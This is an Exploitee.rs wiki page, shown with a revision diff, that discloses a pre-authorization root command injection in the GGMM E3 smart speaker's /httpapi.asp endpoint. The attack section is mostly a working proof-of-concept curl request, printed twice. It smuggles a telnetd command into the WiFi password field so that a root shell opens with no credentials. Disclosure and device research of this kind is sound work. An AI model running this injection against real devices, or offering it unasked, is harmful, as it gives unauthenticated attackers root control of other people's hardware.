Difference between revisions of "GGMM E3 Smart Speaker"

From Exploitee.rs
(Pre Auth Root Command Injection)
 
Line 12: Line 12:
 
[https://www.amazon.com/GGMM-Speakers-Multi-Room-Bluetooth-Compatible/dp/B01E3MXHKA/ref=sr_1_1?s=electronics&ie=UTF8&qid=1502258299&sr=1-1&tag=exploiteers-20 Purchase the GGMM E3 Smart Speaker at Amazon]
 
[https://www.amazon.com/GGMM-Speakers-Multi-Room-Bluetooth-Compatible/dp/B01E3MXHKA/ref=sr_1_1?s=electronics&ie=UTF8&qid=1502258299&sr=1-1&tag=exploiteers-20 Purchase the GGMM E3 Smart Speaker at Amazon]
  
==Pre Auth Root Command Injection==
+
==Pre-Authorization Root Command Injection==
  
Target: /httpapi.asp
+
A pre-authorization command injection bug exists in the main application, as the WiFi password is directly passed to a command line utility. A simple command injection via a curl request can spawn a telnet shell, as the root user with no credentials needed.
  
 +
Proof of Concept:
 
<pre style="white-space: pre-wrap;">
 
<pre style="white-space: pre-wrap;">
 
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
 
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed

Latest revision as of 00:44, 11 August 2017

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

GGMME3.JPG

GGMM E3 Smart Speaker

"Enjoy the full rich sound by wirelessly streaming your favirote music to GGMM E3. E3 uses Wi-Fi/ Bluetooth 4.0 technology to equally project exquisite audio wirelessly."

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the GGMM E3 Smart Speaker at Amazon

Pre-Authorization Root Command Injection

A pre-authorization command injection bug exists in the main application, as the WiFi password is directly passed to a command line utility. A simple command injection via a curl request can spawn a telnet shell, as the root user with no credentials needed.

Proof of Concept:

curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed

Connect to the telnet service as root

Demo